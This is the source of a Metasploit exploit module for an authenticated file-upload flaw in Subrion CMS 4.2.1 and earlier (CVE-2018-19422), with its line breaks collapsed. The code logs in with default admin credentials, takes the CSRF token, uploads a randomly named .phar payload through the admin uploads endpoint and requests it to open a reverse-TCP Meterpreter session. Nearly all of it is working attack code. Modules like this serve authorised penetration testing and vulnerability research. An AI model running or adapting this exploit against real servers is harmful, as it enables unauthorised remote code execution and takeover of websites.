Intelliants Subrion CMS 4.2.1 Remote Code Execution

### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::PhpEXE  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Intelliants Subrion CMS 4.2.1 - Authenticated File Upload Bypass to RCE',        'Description' => %q{          This module exploits an authenticated file upload vulnerability in          Subrion CMS versions 4.2.1 and lower. The vulnerability is caused by          the .htaccess file not preventing the execution of .pht, .phar, and          .xhtml files. Files with these extensions are not included in the          .htaccess blacklist, hence these files can be uploaded and executed          to achieve remote code execution. In this module, a .phar file with          a randomized name is uploaded and executed to receive a Meterpreter          session on the target, then deletes itself afterwards.        },        'License' => MSF_LICENSE,        'Author' => [          'Hexife',             # Original discovery, PoC, and CVE submission          'Fellipe Oliveira',   # ExploitDB author          'Ismail E. Dawoodjee' # Metasploit module author        ],        'References' => [          [ 'EDB', '49876' ],          [ 'CVE', '2018-19422' ],          [ 'URL', 'https://github.com/intelliants/subrion/issues/801' ],          [ 'URL', 'https://github.com/intelliants/subrion/issues/840' ],          [ 'URL', 'https://github.com/advisories/GHSA-73xj-v6gc-g5p5' ]        ],        'Platform' => 'php',        'Arch' => ARCH_PHP,        'Targets' => [          [            'PHP',            {              'Platform' => 'php',              'Arch' => ARCH_PHP,              'Type' => :php,              'DefaultOptions' => {                'PAYLOAD' => 'php/meterpreter/reverse_tcp'              }            }          ]        ],        'Privileged' => false,        'DisclosureDate' => '2018-11-04',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]        }      )    )    register_options(      [        Opt::RPORT(80, true, 'Subrion CMS default port'),        OptString.new('TARGETURI', [ true, 'Base path', '/' ]),        OptString.new('USERNAME', [ true, 'Username to authenticate with', 'admin' ]),        OptString.new('PASSWORD', [ true, 'Password to authenticate with', 'admin' ])      ]    )  end  def check    uri = normalize_uri(target_uri.path, 'panel/') # requires a trailing forward slash    print_status("Checking target web server for a response at: #{full_uri(uri)}")    res = send_request_cgi({      'method' => 'GET',      'uri' => uri    })    unless res      return CheckCode::Unknown('Target did not respond to check request.')    end    unless res.code == 200 && res.body.downcase.include?('subrion')      return CheckCode::Unknown('Target is not running Subrion CMS.')    end    print_good('Target is running Subrion CMS.')    # Powered by <a href="https://subrion.org/" title="Subrion CMS">Subrion CMS v4.2.1</a><br>    print_status('Checking Subrion CMS version...')    version_number = res.body.to_s.scan(/Subrion\sCMS\sv([\d.]+)/).flatten.first    unless version_number      return CheckCode::Detected('Subrion CMS version cannot be determined.')    end    print_good("Target is running Subrion CMS Version #{version_number}.")    if Rex::Version.new(version_number) <= Rex::Version.new('4.2.1')      return CheckCode::Appears(        'However, this version check does not guarantee that the target is vulnerable, ' \        'since a fix for the vulnerability can easily be applied by a web admin.'      )    end    return CheckCode::Safe  end  def login_and_get_csrf_token(username, password)    print_status('Connecting to Subrion Admin Panel login page to obtain CSRF token...')    # Session cookies need to be kept to preserve the CSRF token across multiple requests    uri = normalize_uri(target_uri.path, 'panel/')    res = send_request_cgi({      'method' => 'GET',      'uri' => uri,      'keep_cookies' => true    })    unless res && res.code == 200      fail_with(Failure::Unknown, "#{peer} - Could not access the Subrion Admin Panel page.")    end    # <input type="hidden" name="__st" value="CA0S3w50vz1zRpdgZl98JAMVrimiXI63lKtxAwyi">    %r{name="__st" value="(?<csrf_token>[\w+=/]+)">} =~ res.body    fail_with(Failure::NotFound, "#{peer} - Failed to get CSRF token.") if csrf_token.nil?    print_good("Successfully obtained CSRF token: #{csrf_token}")    print_status(      "Logging in to Subrion Admin Panel at: #{full_uri(uri)} " \      "using credentials #{datastore['USERNAME']}:#{datastore['PASSWORD']}"    )    auth = send_request_cgi({      'method' => 'POST',      'uri' => uri,      'keep_cookies' => true,      'vars_post' => {        '__st' => csrf_token,        'username' => username,        'password' => password      }    })    unless auth && auth.code == 200      fail_with(Failure::NoAccess, "#{peer} - Failed to log in, cannot access the Admin Panel page.")    end    %r{name="__st" value="(?<csrf_token_auth>[\w+=/]+)">} =~ auth.body    unless csrf_token == csrf_token_auth && auth.body.downcase.include?('administrator')      fail_with(Failure::NoAccess, "#{peer} - Failed to log in, invalid credentials.")    end    print_good('Successfully logged in as Administrator.')    return csrf_token  end  def upload_and_execute_payload(csrf_token)    print_status('Preparing payload...')    # set `unlink_self: true` to delete the file after execution    payload_name = "#{Rex::Text.rand_text_alpha_lower(10)}.phar"    php_payload = get_write_exec_payload(unlink_self: true)    data = Rex::MIME::Message.new    data.add_part(Rex::Text.rand_text_alphanumeric(14), nil, nil, 'form-data; name="reqid"')    data.add_part('upload', nil, nil, 'form-data; name="cmd"')    data.add_part('l1_Lw', nil, nil, 'form-data; name="target"')    data.add_part(csrf_token, nil, nil, 'form-data; name="__st"')    data.add_part(      "#{php_payload}\n",      'application/octet-stream',      nil,      "form-data; name=\"upload[]\"; filename=\"#{payload_name}\""    )    data.add_part(Time.now.getutc.to_i.to_s, nil, nil, 'form-data; name="mtime[]"')    print_status('Sending POST data...')    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'panel', 'uploads', 'read.json'),      'keep_cookies' => true,      'ctype' => "multipart/form-data; boundary=#{data.bound}",      'data' => data.to_s    })    unless res && res.code == 200      fail_with(Failure::UnexpectedReply, "#{peer} - Failed to upload PHP payload.")    end    payload_uri = normalize_uri(target_uri.path, 'uploads', payload_name)    print_good("Successfully uploaded payload at: #{full_uri(payload_uri)}")    # This execution request returns nil    print_status("Executing '#{payload_name}'... This file will be deleted after execution.")    send_request_cgi({      'method' => 'GET',      'uri' => payload_uri,      'keep_cookies' => true    })    print_good("Successfully executed payload: #{full_uri(payload_uri)}")  end  def exploit    csrf_token = login_and_get_csrf_token(datastore['USERNAME'], datastore['PASSWORD'])    upload_and_execute_payload(csrf_token)  endend